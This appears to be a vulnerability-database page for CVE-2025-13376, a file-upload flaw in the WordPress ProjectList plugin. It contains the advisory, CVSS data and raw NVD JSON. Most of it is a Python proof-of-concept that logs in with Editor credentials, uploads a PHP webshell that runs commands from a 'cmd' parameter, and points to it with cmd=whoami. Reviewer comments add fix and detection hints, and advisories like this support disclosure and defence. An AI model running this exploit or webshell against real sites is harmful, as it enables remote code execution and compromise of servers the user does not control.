Security Vulnerability Report
CVE-2025-13376 CVSS 7.2 HIGH

CVE-2025-13376

Published: 2025-11-25 08:15:50
Last Modified: 2026-04-15 00:35:42

Description

The ProjectList plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 0.3.0. This makes it possible for authenticated attackers, with Editor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

WordPress ProjectList plugin <= 0.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
#!/usr/bin/env python3
# CVE-2025-13376 PoC - WordPress ProjectList Plugin Arbitrary File Upload
# Requires Editor-level access
#
# What this script demonstrates (CWE-434, per the advisory's weakness entry):
# the plugin's pages/pl-add.php accepts a multipart upload without validating
# the file type, so an authenticated Editor can place a .php file under the
# site's upload directory. The defensive fix is a server-side allowlist of
# extensions/MIME types in the upload handler; a compensating control is
# denying PHP execution under wp-content/uploads at the web-server layer.
# Detection signals visible in this flow: a .php file created under
# wp-content/uploads/projects/, and requests to it carrying a `cmd` query
# parameter.
#
# All target and credential values below are hardcoded placeholders.

import requests
import sys  # NOTE(review): imported but not used anywhere in this script

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "editor_user"
PASSWORD = "editor_password"
# Vulnerable upload handler (the advisory references pl-add.php line 27).
PLUGIN_PATH = "/wp-content/plugins/projectlist/pages/pl-add.php"


def get_nonce(login_url):
    """Extract WordPress nonce from login page

    Fetches *login_url* and scans the body line by line for a line
    mentioning ``wpnonce``; returns the first hex ``value="..."`` found on
    such a line, or ``None`` when no line matches.
    """
    response = requests.get(login_url, timeout=30)
    for line in response.text.split('\n'):
        # Both tests are redundant ('_wpnonce' contains 'wpnonce'); kept as is.
        if 'wpnonce' in line.lower() or '_wpnonce' in line.lower():
            import re  # NOTE(review): function-scope import inside the loop; module level would be conventional
            nonce_match = re.search(r'value="([a-f0-9]+)"', line)
            if nonce_match:
                return nonce_match.group(1)
    return None


def login_wordpress():
    """Authenticate to WordPress

    Submits the standard wp-login.php form with the hardcoded credentials.
    Returns the ``requests.Session`` on apparent success, else ``None``.
    Success is a heuristic: a ``wordpress_logged_in`` cookie in the session
    jar or the string ``wp-settings`` in the response body.
    """
    session = requests.Session()
    login_url = f"{TARGET_URL}/wp-login.php"
    # Get login nonce
    nonce = get_nonce(login_url)
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': f'{TARGET_URL}/wp-admin/',
        'testcookie': '1'
    }
    # Only attached when the login page exposed one; otherwise the form is
    # posted without it.
    if nonce:
        login_data['_wpnonce'] = nonce
    response = session.post(login_url, data=login_data, cookies=session.cookies, timeout=30)
    if 'wordpress_logged_in' in str(session.cookies) or 'wp-settings' in response.text:
        return session
    return None


def upload_shell(session):
    """Upload malicious PHP shell

    Posts a multipart form to the plugin's add-project handler using the
    authenticated *session*. The upload field is ``project_file`` and the
    accompanying fields are ``action=add_project`` / ``submit=Upload``.
    Returns ``True`` if the server answered 200, ``False`` otherwise
    (including on any exception, which is printed rather than raised).

    Note for defenders: HTTP 200 here only means the request was accepted;
    the script does not verify that a file was actually written. A file
    named shell.php appearing under wp-content/uploads/projects/ is the
    artifact to look for on a host suspected of having been tested this way.
    """
    upload_url = f"{TARGET_URL}{PLUGIN_PATH}"
    # PHP webshell content
    webshell = b"<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"
    # Declared content type is application/x-php; the vulnerable handler does
    # not check it (that is the missing validation the CVE describes).
    files = {
        'project_file': ('shell.php', webshell, 'application/x-php')
    }
    data = {
        'action': 'add_project',
        'submit': 'Upload'
    }
    try:
        response = session.post(upload_url, files=files, data=data, timeout=30)
        if response.status_code == 200:
            # Check for uploaded file path in response
            # (the comment above describes intent only; the code below does
            # not inspect the response body, it just reports the status).
            print("[+] File upload request sent successfully")
            print("[+] Check if shell is accessible at: "
                  f"{TARGET_URL}/wp-content/uploads/projects/shell.php?cmd=whoami")
            return True
    except Exception as e:  # NOTE(review): broad catch; network and HTTP errors are reported, not distinguished
        print(f"[-] Error: {e}")
    return False


if __name__ == "__main__":
    # Entry point: log in with the hardcoded Editor credentials, then attempt
    # the upload. Nothing is retried; a failed login ends the run.
    print("[*] CVE-2025-13376 - WordPress ProjectList Plugin File Upload")
    print("[*] Target:", TARGET_URL)
    session = login_wordpress()
    if session:
        print("[+] Login successful")
        upload_shell(session)
    else:
        print("[-] Login failed")

References

Raw JSON Data

{"cve": {"id": "CVE-2025-13376", "sourceIdentifier": "[email protected]", "published": "2025-11-25T08:15:49.877", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ProjectList plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in all versions up to, and including, 0.3.0. This makes it possible for authenticated attackers, with Editor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/projectlist/tags/0.3.0/pages/pl-add.php#L27", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/projectlist/trunk/pages/pl-add.php#L27", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/781c3b84-df80-470e-8bcb-3305a8bbb64a?source=cve", "source": "[email protected]"}]}}